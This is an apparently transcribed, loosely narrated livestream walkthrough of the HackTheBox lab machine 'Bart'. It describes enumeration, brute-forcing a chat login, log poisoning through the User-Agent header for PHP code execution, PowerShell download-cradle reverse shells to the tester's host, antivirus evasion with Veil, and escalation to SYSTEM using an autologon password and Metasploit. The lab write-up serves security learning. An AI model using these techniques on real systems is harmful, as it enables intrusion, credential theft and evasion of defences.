All right, so we will be doing the retired machine Bart from HackTheBox. Uh, Relatively difficult Windows machine. Definitely not going to be an easier machine, similar to when I did Sense or Kotarik. Kotarik was somewhat difficult, but um, Bart's really interesting. It was frustrating and fun all at the same time, and that's really what you can ask for when it comes to these boxes. So without more preamble, let's just get into it. So we'll make a directory called nmap. And then we will run nmap sv to enumerate versions, sc to run default scripts on open ports, oa to output um, into formats that we can read, and we'll do initial. We'll just do first. And then the IP of the box, which is 81, 10.10.10.81, there. Give this a little bit to run. All right. So at first, um, before we analyze that, let's just set up a full, this dash p dash will be a full TCP port scan, all 65,000 some odd ones. Just so we have something going on in the background. We'll name that full. Then we'll take a look here. We got port 80 running, so that seems to be it. And with the scripts that it ran, looks like it's using a domain name or virtual host routing. So we can go ahead and add that to our hosts file. So 10.10.10.81 will be forum.bart.htb. So now, okay, so we got that going. Let's just make sure that works as well. Bart HTB. There we go. All right. Just taking a quick look just at the curl command or curl output. We got Bart, some CSS stuff. Da, da, da. Okay. Looks like we got some filler in here, the lorem ipsum paragraph filler. We are a team of code artists. Your voice will be heard, blah, blah, blah. Okay. All right. So that's not super easy to read, so we'll just get out of that. Um, and while that's running, we'll just go to it in our browser here. What was it? Forum bart.htb. Okay. So we'll pull the source up there. Just look around. Photography. Okay. Looks like we got some team members that could be potential users. We got Samantha Brown, CEO, Daniel Simmons, head of sales, and Robert Hilton, head of IT. Generally, the IT CEO would be like a spearfishing target. Head of sales could be interesting, especially with the implication of financial loot. But head of IT, IT staff, CEOs, stuff like that. People who would have elevated clearance into systems that we would want to get into, um, probably a good idea. Because though Daniel here might be able to go into a financial system and look at stuff like that, IT might have reign over not only that system, but other systems as well to provide maintenance and support and stuff. So We can see here I have a plugin called Wappalizer, where it just takes a look at the web application running, and it'll find out what's running on it. So we got WordPress running 4.8.2. We'll look through here. Developer at Fluffy Unicorns. Okay. Info at Bart.htb. Possible email, probably not, probably a fake. But we can sift through the code here. So we got that lorem ipsum stuff, info. The main thing to look for, not only these long lines like that to see if anything's at the end there, just kind of hiding or chilling out with these CTFs, but also any commented blocks. So like the green text always pops out at me because I'm thinking um, someone would want to put a message in there that normally only people would see if they're looking at the source code, which not a lot of people do. So to that vein, we have a block right here. Um, so it looks like it's calling. Okay, and we have another user, Harvey Potter. He's the developer at Bart. So that's another potential um, user that um, we could target. We also have a email, um, which seems to just be first letter dot last name at host name. Um, Adding other employees breaks the CSS. I will fix that later. Okay, so it seems like he has it set up to add the user as soon as they roll out the patch or whatever. Just see if anything's at the side here. No, just long HTML. Anything else? Okay, so that full TCP scan didn't come back with anything else, so it's safe to assume that we should just be focusing on port 80. So I will then start to run GoBuster. So we'll give it the URL of forum.bar.htb. Word list user share word list dirbuster buster directory 23 medium. We'll give it 30 threads. So that's going. Actually, before we do that, let's do that. We're gonna add those 401, 402, and let's just stick with that. So we'll let that run, open up a new pane, and since we um, through the Wappalizer, you might be able to in the source code too see if there's any like WordPress. There's WP. Ah, here we go. Um, so like WP dash content. It's pointing to, and that's how that Wappalizer is just sifting through the code and um, seeing if it can derive what's running. And right here, content, WordPress, blah blah blah, stuff like that. So we know that WordPress is running on it. So we will use. Ooh, why am I blanking? WP scan. So we will do URL http forum.bar.htb. Enumerate. Generally, I just like to do everything. So PTUTT. Let's just do that. Sure, let's update. Shouldn't take too long. There we go. So that'll be scanning. Nothing yet from the GoBuster. So that is running. We could, while we're waiting as well, we could have another Nmap scan going for maybe like UDP ports. Some of the more specific stuff like that, but I tend to only do those if I run out of options. Um, if TCP initial TCP scan doesn't really find anything, um, or if a full scan doesn't find anything different, stuff like that. So that's taken a little bit. We can poke around here, see what's going on here. Blog, next event. If we're telling you new employee, Daniela Lamborghini. Um, Again, another user that could potentially be a target. So if we saw before it was h.potter blah blah blah, we could assume that she would be d.lamborghini. Employees, I'm sure just goes here. All these links are dead. Okay, so male D Simmons, S Brown, yeah, R Hilton. Okay, so that's good to know. There we go. We got some stuff going. Oop, 12 vulnerabilities. A lot of these, most of these will mean nothing. Either cross-site scripting, which isn't really good for us, or just like disclosures and stuff like that. So that's going. Authenticated, nope. Escape version, safe redirect, remove localhost, add DOS, cross-site scripting, adding a new user, key weak hashing, feed escaping, authenticated, nope. Prepare weakness, it's like a PHP bug. And then injection and password reset. So we could explore a couple of those. Most of them seem not great. Let's see. I think we saw when we were doing that. Okay, we saw that. Let's look through this block here again. WP post image. Just looking for any signs of any hidden directories that we can just find right away. So actually let's do forum. Oh, that's it. Let's see. We can try WP content. Okay. Am I still good with my hostname? Yep. Okay, so there might be some blocking going on. Okay, no usernames. Okay, so that's a good scan, but nothing really useful that jumps out right away. We will keep that up just in case. Let's see. Bum, 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 bum. Roll button. Info. Just looking at anything that might do a reference to some sort of directory that we would want. Let's see. Harvey Potter. Avatar. Let's see if our... Nope, nothing there yet. We're still just looking through here. A reference to blah. Okay. See if we can get like start enumerating on our own. So no login. That might not be good. Well, it's not returning anything. Internal server error. Just nope. Do. Just checking on my stream here. Da. Sorry, just doing some side stuff here. All right. So, looks like most things on here. Sorry about that, guys. Turn that down. So, most things on here are giving out a 500 error, which is an internal server error. We can go through burp and I'll actually just load it up just to have it. But it is just giving 500 errors. Blah, blah, blah. Let that warm up. Okay. So, okay, so now we have that just for just on the side. So the next step here, so we can go ahead and cancel that. The next step here, clear that, is to, so since there are three, I guess you could say variables there in the domain name, we can assume that bart.htb is the root root domain for that, and then anything x dot whatever would just be a subdomain. So what we can do, let's go back into Etsy hosts. We'll keep that. Actually, yeah. Go into there. And we'll try and add just bart.htb. Let's see if we can do that. Left intact. 302 found. Okay. So let's try that, and then let's try our Go Buster again. Let's try just Bart. Oop. P //. Ooh. Okay, all right. So it's returning everything back. So it looks like everything in the list. So we can just try one of them. So we'll do Bart and then that. Okay, and then that just returns this generic. I've seen this picture before. It's just a generic 404 page. So what we'll do, since everything is returning 200, we can try and do it through wfuzz, which will let us see like content length, headers, stuff like that. So we can include code lines, words, characters, or we can hide stuff with that. So first we can just do -u bart.htb -w user share word lists dirbuster directory 23 medium. So let's just do that. Oh, and then with wfuzz you have to give it a parameter to fuzz. So we're looking for directories, so we'll throw fuzz into there. Okay. So let's just make sure. So like 2005. It's giving us that. So you can see the characters, the words, or the lines are all the same. So we can then do let us hide lines. The L. Yep. HL 630. So now it's going to hide everything with that amount of lines and then give us something that returns with anything different. We could have done it with characters, etc. But I think that's just a good one to try out. So we will let that run. And the next thing that we can do, let's see if we just go to this. We can open up a new pane. We can just throw nicto at it. Bart.htb. See if that comes up with anything. We do get a return here. It has one line, 10 words, 145 characters forum. So I assume if we do bart.htb/forum, it'll probably take us to this. Ooh, that was new. Same deal though. So forum.htb similar to HTB, or I'm sorry, forum.bart.htb similar to bart.htb/forum. So that's good to know. Let this go. Let's see if nicto root page redirects to that. I'm not sure if it'll follow the redirect. Looks like we'll find out. See how the stream's doing. Keep it on there. Da, da, da. All right, nothing crazy going on. Um, it's still running. So let's see. So like follow redirects or something like that. Well, actually, let's just point it at a forum. Just have it run at that. See if it finds anything interesting. Speaking of interesting, we do have a 301 on monitors. Let's try that out. Go to monitor. Just thinking about it. Right, bart.htb/monitor. There we go. So it looks like we have a application running here, server monitor. Oop. Let's just reload the page. All right, let's do that. See if we find anything interesting in the source again. Ba, ba, ba. Password, remember me. Looks like there's a forgot password function. So that's good to enumerate usernames, which we can pull from the forum. So let's pull that up. Get these guys. And then there's Harvey as well. Nothing stands out. We could always see if there's any source code available for this PHP server monitor thing. So let's just try admin. Information's incorrect. Admin password. Okay. Let's close that. Let's try Samantha admin. No. Daniel. Whoop. Information's incorrect. Robert. Just trying their first names. Then we'll try their um, their assigned names. So like Robert would be R.Hilton, and then there was Harvey password. Information's incorrect. All right. So instead of just guessing through that, see if anything else pops up for that. Let's try this forgot password thing. So let's try Samantha. Provided username cannot be found. Good. So next we'll try Daniel. Okay, so Daniel's one. We'll try Robert. Oop, wait. Robert. Okay, we got. Looks like we got something else hit there too. Capital F for him. We just tried Robert, right? So Harvey. See what that user was down here. Harvey. Yep. Harvey. Okay. So Harvey's another one too. Let's try like Harvey password. Da. Information's incorrect. Let's reload that. We'll resend it. Get rid of that script there. Let's get rid of this thing. Harvey Bart. We could always throw this into Hydra if we run out of possible ways to log in. Next we can do Harvey H.Potter. And then next we could do Potter. So Harvey Potter. Okay, cool. So that it looks like that logged us in and it brought us to this domain here. So let's go ahead and add that as well. It's starting to load up here. Ugh. Okay. Ooh, don't know what that did. So let's connect there and see what we got on the other side. Let's close that. No, what was it? Harvey Potter. Cool. So this is the server monitor. Again, go into here. Okay, nothing crazy. Looks pretty standard. We got an internal chat going here. And we have yet another host name. So now we have, what is it, internal 01.bart.htb. Can't copy that. Internal 01 internal-01.bart.htb. Okay, we have yet another login page. So it looks like we're just bouncing around through their internal network. And you can see that this says dev here. So let's see if we can do Harvey Potter again. Password must be at least 8 characters. So like Harvey password. Invalid. Daniel password. Invalid. So let's go ahead instead of doing what, whoa, God. Let's go ahead and kill that. Let's go ahead and throw this into Hydra. Gonna, what am I doing? Intercept is on. We'll just do admin admin. We just want to see what this post request looks like. Cool. So we'll do Hydra. We'll do -h. Hydra. Let's try Daniel. Since we already logged in as Harvey. Actually, let's just make a list. Nah. We'll be here all day with that. So let's just try Daniel. We'll go through and let it user share word lists. We'll give it a set amount of time. Let's see if I can remember. Let's just do that. Hydra post form. Come on. All right. So Okay, here we go. So looks like we need the IP first. Let's clear that. Hydra, where are we? Internal. Let's go into here. Internal 01.bart.htb. HTTP form post. And then we're doing simple chat slash login.php. So PHP. Uname equals user. So this caret user caret will tell Hydra to pull whatever parameter we're using for the user, whether it be a list or just a single username, and just dump it into that this parameter here. And then similar with passwd, we'll do caret pass caret. So then we need submit equals login. And then we need something that makes it so we'll just do that. Login, was it a colon? Yeah. Blah. So then we'll do L, what do we say? We did Harvey, so let's do Daniel. Dash P user share. Let's not do raw wordless. Let's try Metasploit user share word lists. Rocky is just so large. Unix passwords, yeah. So it'll take this L, take Daniel, throw it into user, take this word list, and then for for I and blah, throw it in here. So we'll do that. We won't do threads or anything. And let's do that. That's no good. Okay. Hmm. Ba, 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 ba. Let's log in PHP. Let's see if it just wants the 10, 10, 10, 81. Why is that doing 80? Oh, port 80. My bad. Okay. Got rid of that hydra.restore so that it doesn't pick up for when it left off. So this is looking a little better. It's not throwing out all that garbage like it did before. We'll let that go. Oh, there it goes. Okay. Let's do the host name again. Maybe it doesn't like these spaces. So let's try password. Because at least we know that'll be on the page, the password. when it fails, like the might be on the page if it successfully logs in. We'll try must next. That probably wouldn't be on there. Ah, Hydra, go again. So everything after this colon, it's just when it makes the request, it'll pull for those terms. Um, be like, oh, is this on the page? If it is, this isn't valid. If it's not on the page, we might have a valid login. Um, it's not 100% accurate, but it seems to work most of the time. Um, so now I know I've been cursed before with this taking a bit with no bad output. Okay, there we go. So it looks like it's going. Looks like it'll finish in, what is that, a minute or an hour? Either way. Shouldn't take the full time to finish. Hopefully the password's actually in here. I do remember the password for this because um, it was very frustrating. It was not fun to figure this out. Um, okay, so that's with the user Daniel. Um, and it looks like that did go through. So yeah, it must have been the spaces. I'm not sure what kind of check it's doing, but for some reason it didn't like that the password must be. Could try the whole string, but as long as this is working, let's try Harvey. We'll just go down the list. Um, it's not worth trying to automate this to do every user. I mean, we could just throw them in a file and it'll just go up, but we know there's probably at least only like 3 that would be worth enumerating. So give it a minute here. Okay, it's giving a status update. So it looks like it's going a bit faster for, oh, I see it just, looks like it did a few more passwords within that minute than last time, so. Okay, so nothing there. Let's see. Blah, blah, blah. Is it not? Let's see. Okay. Maybe that, again, I know the password from doing this a bit back. You know what? These are all lowercase. Uh, let's see what could work. Not Unix passwords, because those are lowercase. What about? Okay, so that one has at least uppercase ones, so let's try this. I don't even remember. Who am I? Alright, or Harvey. Did we do Daniel twice? Oh, okay, there we go. Metasploit common. There we go. Just wanted to show the process instead of just blazing through it, just knowing the password. Um, so that's good to know. Unix passwords only lowercase. We could do some like awk or sed to create a file that um, or to like edit this file to take every word in the list and like make it uppercase. I wonder if I think DD would do that as well. Not sure. Okay, so looks like this will take a. It's a little bit larger than the other one, um, but probably not too bad. So that one had 1,000. This one has 4,000. So there we go. Okay, so if you choose the right file, eventually you'll come back brute force that it's password one. So then you log in. Um, you see that there is a nice little chat system here. So we can refresh. Okay, so that kept what I did. There's a log that says done and returns a 1. Um, let's see if we can see where that goes. So if we just search log, there we go. Function, create a serialized objects and send to log chat.php. Here we go. So it's going to this. So let's see what that does. So when this text box pops up, done 1, um, you can see here, and then it alerts done. So it's going to this. Well, first it'll say done, and then it'll do this. It gets this, and it says the file name is log.txt, username true, or username Harvey. It's just doing a GET request on that link, and then true, XR null, alert done. So since it's passing a true, and we are logged in as Harvey, it's gonna output a 1 for us. Um, so let's see what that file is. Okay, so there's the 1 because it's returning true. And then this little JavaScript thing is just throwing that up into an alert box. So what if we try like admin? 0. Okay, so did we see? Let's get rid of this view source. Let's go back to this. So it looks like Bobby and Daniel are. Whoop, Bobby 1. So that user exists. Okay. And Daniel? Whoops. Okay, so it is doing a little check there. And it's also passing a file name. So we could try like LFI. So file name equals passwd. Failed to open stream. Oh, I'm sorry. This is a Windows box. So like Windows LFI. There we go. So let's try this. Close that. Try a couple more. There's a 3. Didn't know if there was a slash at the beginning there or not. All right. Permission denied. Okay, so does this give us any more? So we know that it is reading local files. Oh, but let's switch back to Harvey. Right, that's who we logged in as? Yep. No such file. No such file. Let's try Harvey. See if he has access. Okay. So next what we can try is remote file inclusion. So we can do like HTTP 10.10.14.8 / blah. Does not support writable connections. Okay. So next we can try, instead of doing like local file inclusion like we were just doing with the appending, like going back in directories, let's just try, we know that this log.php file is probably sitting right where we're executing this. So we can just try to have this log PHP file execute itself and see what it's doing. So log.php username. Okay. Ah, there we go. So this looks like a header. And since it's saying Linux and we know that this is a Windows box, it's probably pulling it from us. So if we go into here, if we forward this into burp, or have burp catch this and send this to the repeater tab, close that one out, dump that, dump that. So we hit go, follow redirection. Wait, what are we doing? Why is it doing a git? No store, no, oh, must read. Ugh. All right. Ba, ba, ba. So let's log out. It's what? Simple chat login form.php. We can change this request to post. We know that uname is Harvey and passwd is password1 and submit equals. So I'm just pulling this from when we did our Hydra thing down here. These are all just the parameters. Was it login form? No, it's just login. These are all just the parameters from down here. So then, if we do that, go 302 found. Okay, so we're in the chat. So now, da, do that, log. Oh, okay. So it looks like we've actually just injected that file in there, so it's just going to keep executing that now. Um, but let's do log. Do that. We'll do Harvey, so we should see that again. Yep. Turn this back on. Turn intercept back on. Refresh. Forward. Good. Refresh. Send that to repeater again. All right, so there we go. So since we can even confirm here, 2100, blah, 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 gecko. Yep. So we can, we know that it's running off PHP. So we can inject our own PHP into the user agent here, since that's what it's quote unquote executing, and see what we get. So let's try and add this, which will just add another parameter into the GET request. So if we hit go, oop, that's doing log.txt. So remember, we got to do PHP. Go. There we go. So since, like I said, it's creating a new parameter for this GET request, it's yelling at us saying we can't execute a blank command as through this request, system request. So we can just add another thing here, and I named it Anubis. And we'll just do who am I, since it's Windows. And there we go. So now we have remote code execution. So next thing we will do, trying to think of how I want to run that. Let's just let's do Empire. All right. So use listeners. Okay, so now we're in the listeners tab. This is just a sort of like a, think of like a Metasploit, but for Windows. So it's like a post exploitation. So if you have remote command execution or you have a shell in the box, I'll show you what we can do with this. So we have listeners, use listener, do HTTP. That'll start up an HTTP server to send all the stagers and whatnot. I think that's it. Yep. And then info. Yep. Yep. So here's all the info, sort of like show options in Metasploit. So we will set the host to us, which I think it's 8. Yep. 14.8, and I like to serve it on 443. Invalid. Just because 443 or SSL, 9 times out of 10 will get out of most firewalls, or outside any DMZ networks. So we'll do 443 and just set the port to 443. info, blah, blah, blah. I think it's execute. Okay, so we got that listener. So now if we go back into our listeners, do launcher, I believe it is. Yep, so we can do this launcher. This will give us the command to run on the host. And you can either do PowerShell or Python. I just do PowerShell because it's easier. And we give it the listener that we have set up, which is the HTTP one. So then we have this. It's all base64 encoded. Grab this. We could even just run it right on here. Like go. Ooh, didn't like that. Let's probably because of the base64. So I'm gonna use burp to URL encode it just to see if it. Oh god. Let's go back a few. All right, so we still have that. But it doesn't like that, right? Control U. Go. It does not like that. So let's go back. Forward. Go. Okay. Let's let's whip up Metasploit real quick just to get a shell to run this on. So we'll do MS Venom. So first we'll create a payload. We'll do Windows. Let's see if we figured out what kind of architecture this is. It's using IIS-10. I'm gonna assume it's 64-bit. So we'll do Windows x64 interpreter reverse TCP. We'll do lhost is equal to 14.8, lport is equal to leet. We'll do PowerShell, and let's push that into verse.ps1. Service post start up the database that Metasploit uses. Okay. Then we'll start up MSF console. And then what we'll do is I'll set up a multi-handler to handle the interpreter payload. I'll then use PowerShell to download this reverse shell that I'll explain better once we're setting it up. So we're doing the multi-handler, set payload as what I just set it, set lhost to ton0, do that twice, set lport to 1337, so same as we set up there. I think that's all we need. Yep. So it's handling that. Okay. So we got that reverse shell. So we'll do Python -m, and we'll just host this on our own little web server. And then we will do PowerShell -c, I think. Let's see. IEX new object net dot web client, download string, slash rev.ps1. Didn't like that. There's a lot of special characters in there, so let's go ahead and encode it. Okay, so we got a hit. Go back to here. Okay, just want to make sure my IP was correct there. So it's okay that it hasn't resolved yet. It still might be executing it. Oh, whoa, whoa. Oh, using system Harvey, no source file. Huh. Warning, no source files specified. Because we poisoned it so many times that every error on the screen, it's going to try and... Why did... Huh. Ugh. Or what if we... copy that. Let's just stop that. Where is the repeater? Yeah, so that's not good. Let's get rid of all that. Insert, no. Set paste. See if we can run that. I'll keep that up just in case, but let's hit go there. And see if we can just have it pull the file and execute on this. Because this is ultimately what we want ran. Um, let's see. This is okay. Oh, I killed my Python. Derp. All right, let's try that again. Let's see if we got a hit back. Okay, sending the stager. Perfect. Okay, so we didn't have to mess with any of that Metasploit garbage. All right, stop the listener. Okay, cool. So we have. Ooh. Oh my gosh. There we go. We have. Let's kill that. We now have this on Empire. So let's see. Interact with that. Okay. So now we can search module like all checks or something. Yep. So we can do this. It's a it's from PowerUp. It's from PowerSploit, which is a fantastic suite. I think I have it locally. Opt PowerSploit Privesc, right? Yep. So power up. It's just a script that you can run. You can just do invoke all checks and oh, it didn't like me doing that. No. Ugh. Agents. No. Burp. Why? Um, interact that. Search module all checks. Use privesc. Power up all checks. I need use module info. Execute. All right, so that's all set up to run. Um, this is sort of like easy mode. We could easily get a shell back on there and just we could upload it, run this ourselves. But if we have remote command execution from a web browser or from a proxy like Burp Suite, um, I don't see why not. It's, you know, essentially doing the same thing. Um, as long as you know what you're doing and like what you're running, and the reasons why you're running it. So it's always good to do the stuff manually first, but so it's running all checks, sending blah. That's interesting. How about we do get a shell? Is it this? No, it's not that screen. Wonder if it didn't like the 32-bit. Let's try that. Let's try to load up Metasploit again. Not going to say it outright, but I noticed something that it should have returned that it didn't. And I'm really curious as to why. Um, but we can go through here. It's going through some registry keys. Looks like it found a DLL application path that we could hijack so that we could throw in um, our own custom DLL, name it, um, whatever the DLL file it found is, and then whenever that's ran again, it has the potential to be abused. Set, let's see, can do that. Set lhost to ton 0, set lport to leads. Let's go back here. We'll have it get that again. Do I have, there we go. See if it likes that a little better. It's okay, take your time. We did load that up into, yep. Oof. Oh boy. Using system, no source file. I can do a quick Google on that. Just PowerShell. Using the source option. No. Let's do 10, 10, 14, 8. Just because I'm paranoid. 10, 10, 14, 8. Can do it as an executable. Load it up again. Do that. 10, 0. Okay. Are we still hosting it? Let's get rid of that. Let's do that. Oh, you know what? We have to do the download file function for PowerShell rather than download string. We'll let it finish up first. I'm sure it's going to freak out. It's probably going to sit there and get it 500 times. Okay. So what we can do here, we can do a dir. See if that does anything. Yep, so it didn't save it. So we'll do download file. Pretty sure it's all the same there. PowerShell download file. Let's see. Ba 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 ba. Invoke web request. New object. Net.download file. So you need the URL. Download file. URL. rev.exe. And let's try rev.exe. Like that. Ah. Go. That even. It didn't even go. Maybe without these. Go. Well, that's not even trying. Let's start from scratch here. PowerShell dash C. IEX new object system net web client dot download file. Do 10.10.14.8 slash rev.exe. Like that. Slash rev.exe. Ugh. URL encoded. Go. See if that actually pulls from us. Da, da, da. So that's the latest one. If this doesn't work, we can do um, another handler like Nishang or something. It just kind of timed out, didn't it? Hmm. Let's try this. Ooh, it did not like that. URL encode. Go ahead. Go. That's interesting. So I wonder if it's just %temp. Hmm. Oh my gosh. All right, let's see if we can find out if that got anywhere. Um, dir %temp. I think that's how you do it. Ugh. All right, forget it. Let's try something else here. Let's do shells. Okay, so 14.8. We'll do elite. How that works? Hang on a minute. Let's see if that works. If that's not how it works, I know of another way. So Python simple HTTP server 480 CLVNP 337. And let's see if we can get that PowerShell back. Download string. Invoke to niche.ps1. Go. Okay, got the hit back. It's grabbing it 300 times. Excuse me. Hopefully at one point it'll execute it. Let's see. No one new in the stream here. Oh, still going. Still going. Might be imperative at this point just to reset the box, just to clear out those logs. I wonder, it probably puts it into that log.txt, right? So we could always try and either delete or clear out that text file. Or no, it doesn't do. Holy God. Let's see. Hopefully soon we'll get a reverse shell here going. It's just that we've just poisoned the stream, that PHP function so much with all those logs that it has to sit there and go through each one. Okay, so that came back and it didn't. Download string. Let's see. I think I screwed up here. Yeah, because I think that's implying it's a, yep. All right, let's try that one more time. There we go, immediately. All right, so now that we have a shell, let's just Google it. Query auto logon registry command line. Let's see. Let's do Windows Privesc. Fuzzy Security has some pretty nice write-ups. Let's see. There we go. There's always elevated. Or we can even look. Let's look that up. It'll probably give. Hopefully, it'll give the source code of what we were using. Safely setting. Come on, Bert. Oh, come on. All right, let's go back into here. Let's kill that. So now if we do that, let's see, what is it, reg colon 64. How do we show x64? There we go. So we'll paste that and then slash reg 64. There we go. All right. So that's probably where this failed. Info. Is that it was checking and it would just run that. Doesn't come back with anything. It just gives up. But if you're in a 32-bit process and you want to look at 64-bit registry keys, you can just add that slash reg 64 and it'll show it what you need. It'll show what you need to know. So if you go through any sort of walkthrough or you know what you're doing when it comes to Windows Privesc, eventually you want to check that because it'll just hard code. It'll hard code passwords in there if someone is set to auto log in. And luckily for us, that's administrator. So we're just one step away from completely owning this box. Now, unlike Linux, where it's super easy to switch users and run commands as other users using their password, Windows is a bit more complicated. This took me quite a bit to figure out. Let's see. So we'll load up Metasploit again just to get some port forwarding going. And so what we're going to do is sort of cheat the system here. What am I looking for here? Let's see. Looks like we're going back to Google for a minute. Port forward Metasploit. Okay, so that's if we have an interpreter. So now, now that we have an actual shell, we can we'll use exploit multi-handler. Set that to that. Set lhost to ton 0. Set lport to... Let's just run a new one. MSF console. Nope. MSF Venom dash P Windows interpreter reverse TCP. Lhost is 10.10.14.8. Lport will be elite. PowerShell. We'll do that into rev.ps1. We'll just save it into a file just so that we have it locally, but also we can just cat it out. Why? I forgot the equals. So let's see. New object net.web client download string 10.10.14.8 slash rev.ps1. Cannot add type. Let's try run that again. Maybe it was wait, where did huh? That's interesting. New object net.web client download string / rev.ps1. Cannot add type, compilation errors occurred. Cannot add type. That certainly is interesting. Let's see. Is it formats? Let's try that. PS1. Maybe that's what was happening. Let's see. That didn't work. Let's see here. Executable formats. Framework transform. Let's see what that does. That is what I wanted. Let's see. This script contains malicious content. Huh. Let's see. Okay. see if we can get some veil evasion going. Let's see. Since there's some sort of antivirus going on, I don't know why this page is so large. All right. Yes. All right. So we got that going. What we'll do is try to um, craft a payload that will get past the antivirus that's running. Let's go ahead and grab the administrator password. Okay, so that's going. Overwrite, use default name. Looks like it's setting up a bunch of stuff. It's being updated. Wine is just a way for Linux to run Windows executables. Okay, sure. Okay. Overwrite, use default names. Oh boy. Let's see. Blah, blah, blah. Sure. I recently migrated my virtual machine over to a new kernel version, so don't have any of the tools that, or I don't have some of the tools that I had before. PyCrypto. Yep. Okay. It's updating my pip for me. Thanks. Installed future. Sure. P file. Okay. Or Ruby. Okay. Sure. What could go wrong? Okra. Doing Go. And it's just going through every single language, isn't it? Da, da, da. Auto LT. Auto agree. Sure. Okay. Holy moly. Oh, auto IT. Hmm. Can't find my. Okay, that's fine. All right, let's try running Veil again. Oh, God. All right, let's do that. Let's see if that fixes any of the broken dependencies that it had. All right. Oh my God. Run config setup. All right. Okay, already did that stuff, so that's fine. Don't know why it has to do this again. Blah, blah, blah. Okay. It's going quicker this time since we don't have to sift through it all. All right, go. All right, auto IT is where it struggled. Command, receiving command result timed out. Okay. Failed to load. Let's see. There we go. All right, available tools, 1. List. Use evasion. 41 payloads. Check virus total, remove, completely exit. List available payloads, list. All right, we want to do interpreter PowerShell. Reverse. All right, use 22, is it? All right. Is it the same as before? Yes, set lhost to 10. All right, whoop. Set lhost to 10, 10, 14, 8. Set lport. Sure. Well, let's do this. Okay. So then should be it, right? Generate. Default is payload. That's fine. PowerShell doesn't compile, so you just get text. Source code written to blah. Metasploit file blah. Okay. -m simple HTTP server 80. Let's see if we can't grab this. Do that. Payload.bat. The splatting operator at cannot be used to reference variables in an expression. Can be used only as an argument to a command. Cat payload. Let's see if that fixed its oh, write exception. Let's download file. Let's do h 10 14 8. That's payload.bat. Space. See inetpub www.root internal01/log/ payload.bat. Send temp. Where is it? The value of temp / payload .bat. Download PowerShell one-liner. Something like that. Let's see. Here we go. Let's see, do that. Download file. Okay, HTTP. Oh. Great. .ps1. All right. So IEX dot 10 10 14 8 / payload .bat, comma, space C Windows temp payload .bat. Write error exception cannot find overload for download string and the argument to. Is it system? All right, IEX new object system net web client download string 10 10 14 8 / payload .bat C Windows temp payload .bat. Ah, God. It's been a long stream. Object net web client download file HTTP 10.10.14.8 slash payload bat C Windows temp payload bat Windows temp payload bat. All right. Cannot bind argument to parameter command because it is null. C. Ah. All right. So let's do this. I just didn't have permission to write into the temporary thing. So let's do Windows users public downloads slash payload bat cannot bind argument to parameter because it is null. See users public downloads payload bat. Let's try without the IEX. Huh. Let's see. Start a command, replace the path. Okay. Let's get rid of some of this stuff. So we have that. Let's try that again. Looks like it immediately died. Neat. Okay. PowerShell reverse TCP. PS exec? Is that what I want? PS exec. Username. Minimum of 2 browsers, hostname. This is not what I want. PowerShell C. I do want this. 22. Let's do that. Minimum processes. Generate. Let's see. Like that. We can load it up with a resource file. 1. There we go. All right. So that way there's no confusion. Okay. And let's get out of that. Python simple HTTP server on port 80. That's running somewhere. Oh, okay. So that's running Python. All right. So let's do this. Oh, new object net.web client dot download file slash 10 10 14 8 slash payload 1.bat comma C users public downloads blah.bat. C users public downloads blah.bat. And it dies immediately. Let's do, so now that I figured out how to get that file going, payload, Windows, x64, interpreter reverse TCP lhost equals 1010 lport equals 444. Format is an executable into blah.exe. Windows x64 interpreter reverse TCP. New object net web client download file 10.10.14.8/blah.exe. See users public downloads blah.exe. I forgot. Quotes, see users public downloads blah.exe. Exception calling. Oh, might help if I have a. Let's see. Copy paste. Okay. See users public downloads blah.exe. Contains a virus or potentially unwanted software. All right, let's get rid of that. Let's see if thought there was a way. Generate Ruby. Okay, great. let's see if this works. So, got that. Copy up to there. / ruby.exe. Simple agent. Comma. Ugh. All right, let's see if this works. Users, public, downloads, ruby.exe. Simply trying to get a interpreter session going. Public downloads ruby.exe. So potentially contains a virus. Wow, this. Whew. Oh man. This is starting to be something else. Let's see. Just trying to catch up on some stuff. Let's see. All right, let's get real. Let's try and do this. So we'll use that. Oh, blah.dll. Set share to test. Set serve host to 10.10.14.8 and set payload to Windows x64 interpreter reverse TCP. Set lhost to ton 0, set lport to elite. Blah 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 blah. Exploit. What is using elite? Oh, jobs kill 0. Exploit -j. All right, so what this does is that it sets up a SMB server on my host, and then if we run this on the real host, we get a Meterpreter session. Okay, so all of that freaking nonsense to do this. So if you remember before, we got that hard-coded login password, auto logon password from the registry. So now we can use, let's see, we'll do that. Use the use that password to run a command as the administrator. So we'll do set session to 1, set password to blah, set user as administrator, show payloads. Can we get a shell? Yep. x64. Let's just do this again. Set payload. Oh. Guess you can't. What can we do? Okay, so set CMD to this again, right? Run. Oh, set domain. How do I get the domain name? Net computer. No. Let's see, we can just query the registry, and it might. I should have saved that one. I wonder if we have it up here. There we go. There we go. Set domain is that. Run. Okay. Uh, um, like that. There we go. Didn't like the double slashes, or the slashes at all, rather. So you just have to escape them. Right? Is that what the issue was? Please? Administrator. That's what it was, right? Administrator. All right. Run. Alright, so this is what I was trying to do before. Port forward. Um, well, jobs. No, right. Port forward dash L 445 dash reverse remote port 445 dash remote host to connect to, like that. Oop, port forward. Oh. The background kill 2 sessions 1. Okay, so now we can do SMB exec. Is that what I want? Or PS exec. No, that's a search PS exec. set our host set SMB pass that set SMB user to administrator exploit. Oh. Show payloads. We'll just do that. Set payload to that. Set all host ton 0. Set L port to 5555. Exploit. Okay, so this connects locally to the port 445, which then forwards it to, with our Metasploit port forwarding, forwards it to Bart. God. Need dash target IP our local host. Oh wait, no. Administrator. Let's see, grab this. So we need administrator password at local host. Connection refused. Interpreter session died because my shell died. Ooh, wait. PS1. Well, that's just convenient, isn't it? So got a connection, get our shell. Users public downloads. Right, downloads. And then MSF console-r. that, right? And then net, no, new object net, what am I doing? New object, web.net client, no, net.web client download file http 10.10.14.8/ruby.exe c users public downloads ruby.exe. Users public downloads. Okay, we got that. Failed. Contains a virus. What did I do to... I thought it was Ruby. Oh, that's right. All right. This is the final stretch. We set up that SMB delivery. Search SMB delivery. That's serve host. Set share test. Set file name. Blah. Set payload. Windows. x64. Interpreter reverse TCP, set lhost on 0, set lport 37, exploit -j. We will run this on our shell. Sessions I-1. Set up that port forwarding again. Somewhere in here. All right. Port forward -h. Port forward add -l local port -p remote port 445 -r localhost kill 0 jobs back jobs kill 0 sessions I1 that. Now where? All right. So now it's going to localhost. Who am I? We are now NT authority system. We are now root. Users administrator. Can't cd. All right. Slash desktop. There's the root file, or the root.txt file. So we stumbled through that a bit, but it's all good learning. Hopefully someone got something out of this. If not, it was a journey for me. So with that, I am going to stop now 